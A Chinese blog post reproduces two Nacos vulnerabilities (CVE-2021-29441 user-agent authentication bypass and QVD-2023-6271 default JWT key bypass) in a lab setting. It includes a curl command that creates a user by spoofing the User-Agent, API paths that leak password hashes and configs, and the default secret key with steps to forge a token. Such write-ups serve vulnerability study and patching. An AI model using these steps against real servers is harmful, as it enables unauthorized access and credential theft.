首页 > 其他分享 >Nacos漏洞复现总结

Nacos漏洞复现总结

时间:2023-12-22 10:45:12浏览次数:29  
标签:pageNo v1 nacos Nacos 漏洞 复现

目录

未授权访问(CVE-2021-29441)

漏洞简介

该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为"Nacos-Server",如果是的话则不进行任何认证。

影响版本

Nacos <= 2.0.0-ALPHA.1

环境搭建

vulhub

docker-compose up -d

漏洞复现

访问http://ip:8848/nacos/v1/auth/users?pageNo=1&pageSize=1会发现是403

但把ua改为Nacos-Server即可获取到账号和加密的密码

离线爆破
BCryptDecode

可以创建用户名密码进行登录

curl -X POST -d "username=test&password=test" -H "User-Agent: Nacos-Server" "http://192.168.30.131:8848/nacos/v1/auth/users"

有的版本直接访问就可以获取到敏感信息

/nacos/v1/auth/users?pageNo=1&pageSize=1
/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=dev&search=accurate
/nacos/v1/core/cluster/nodes?withInstances=false&pageNo=1&pageS%20ize=10&keyword

权限绕过登陆(QVD-2023-6271)

漏洞简介

Nacos用户使用默认JWT密钥导致未授权访问漏洞.通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户.

影响版本

0.1.0<= Nacos<= 2.2.0

环境搭建

Nacos2.2.0-BETA
执行

./startup.sh -m standalone

漏洞复现

进入容器,找到默认密钥

SecretKey012345678901234567890123456789012345678901234567890123456789


利用jwt.io构造出jwt
其中payload为sub:nacos,exp:较大的时间戳,密钥为默认密钥,勾选base64加密

然后把一个登录包发送到重放模块,添加Authorization: Bearer (jwt)

然后再抓取一个登录包,把Authorization: Bearer (jwt)添加到头部

然后放包,就可以权限绕过了

标签:pageNo,v1,nacos,Nacos,漏洞,复现
From: https://www.cnblogs.com/thebeastofwar/p/17920565.html

相关文章

  • CentOS7下安装著名商业漏洞扫描工具Nexpose_6.6.156
    Nexpose简单介绍Nexpose是Rapid7出品,一款著名的、极佳的商业漏洞扫描工具。跟一般的扫描工具不同,Nexpose自身的功能非常强大,可以更新其漏洞数据库,以保证最新的漏洞被扫描到。漏洞扫描效率非常高,对于大型复杂网络,可优先考虑使用;可以给出哪些漏洞可以被MetasploitExploit,哪些漏......
  • Nacos未授权 CVE-2021-29441
    Nacos未授权CVE-2021-29441环境搭建环境dockerfile在文末环境启动docker-composeup-d查看下当前的容器dockerps漏洞复现访问Web页面127.0.0.1:8848抓包,访问http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=2将User-Agent的值修改为Nacos-Server......
  • 09 信息打点-CDN 绕过篇&漏洞回链&接口探针&全网扫描&反向邮件
    一、知识点1.1CDN知识-工作原理及阻碍1.1.1CND概念CDN的全称是ContentDeliveryNetwork,即内容分发网络。其基本思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节,使内容传输得更快、更稳定。通过在网络各处放置节点服务器所构成的在现有的互联网基础之上的一......
  • nacos 2.3.0 支持 java openjdk 22吗? 支持
    [nacos2.2.3支持jdk17吗?-SegmentFault思否](https://segmentfault.com/q/1010000044179850)renguoqiang@ubuntulenovo:~/gitee_base/nacos-server-2.3.0/bin$java找不到命令“java”,但可以通过以下软件包安装它:sudoaptinstalldefault-jre#version2:1.......
  • 最新Docker搭建DVWA和SQLi-LABS漏洞练习平台
    搭建DVWADVWA是一款开源的渗透测试漏洞练习平台,内含XSS、SQL注入、文件上传、文件包含、CSRF和暴力破解等漏洞的测试环境。可以在Docker Hub上搜索DVWA,有多个用户共享了搭建好的DVWA镜像(注意,有些镜像可能存在后门),此处选择镜像——sagikazarmark/dvwa,安装命令如下:docker pull......
  • 渗透测试和漏洞扫描有什么区别
    渗透测试和漏洞扫描是网络安全领域中非常重要的两种技术手段,它们都可以帮助组织或企业发现和修复系统中的漏洞和弱点。然而,这两种技术手段在目的、深度、方法和时间和成本等方面存在显著的区别。首先我们来了解下渗透测试和漏洞扫描分别是什么?渗透测试(PenetrationTesting)是通过......
  • nacos 服务注册中心搭建
    Nacos-Server服务部署Nacos依赖Java环境来运行。如果是从代码开始构建并运行Nacos,还需要配置Maven环境。我们直接使用发行版,需要保证JDK版本在1.8以上。NacosServer有两种运行模式:standalone(单机)cluster(集群)standalone模式(单机)从https://github.com/alibaba/naco......
  • ElasticSearch 命令执行漏洞
    漏洞编号:CVE-2014-3120漏洞详情CVE编号CVE-2014-3120漏洞级别中危6.8标题Elasticsearch默认配置允许动态脚本执行漏洞披露时间2014/07/29漏洞总结Elasticsearch1.2版本及之前的默认配置启用了动态脚本,攻击者可以通过_search的source参数执行任意MVEL表达式和......
  • Owasp Top10 漏洞解析 之注入
    一、注入漏洞是什么?注入漏洞,即将不受信任的数据作为命令或查询的一部分发送到解析器时,会产生诸如SQL注入NoSQL注入、OS注入和LDAP注入的注入缺陷。攻击者的恶意数据可以诱使解析器在没有适当授权的情况下执行非预期命今或访问数据。几乎任何数据源都能成为注入载体,包括环境变量......
  • struts2相关漏洞
    过去爆出的历史漏洞可以使用一些集成工具才探测,这里复现一些工具未集成的漏洞struts2代码执行(CVE-2020-17530)(S2-061)启动环境 使用另一个exp来执行https://github.com/YanMu2020/s2-062E:\pythons2-062.py--urlhttp://x.x.x.x:x/.action--cmdid命令回显uid=0(ro......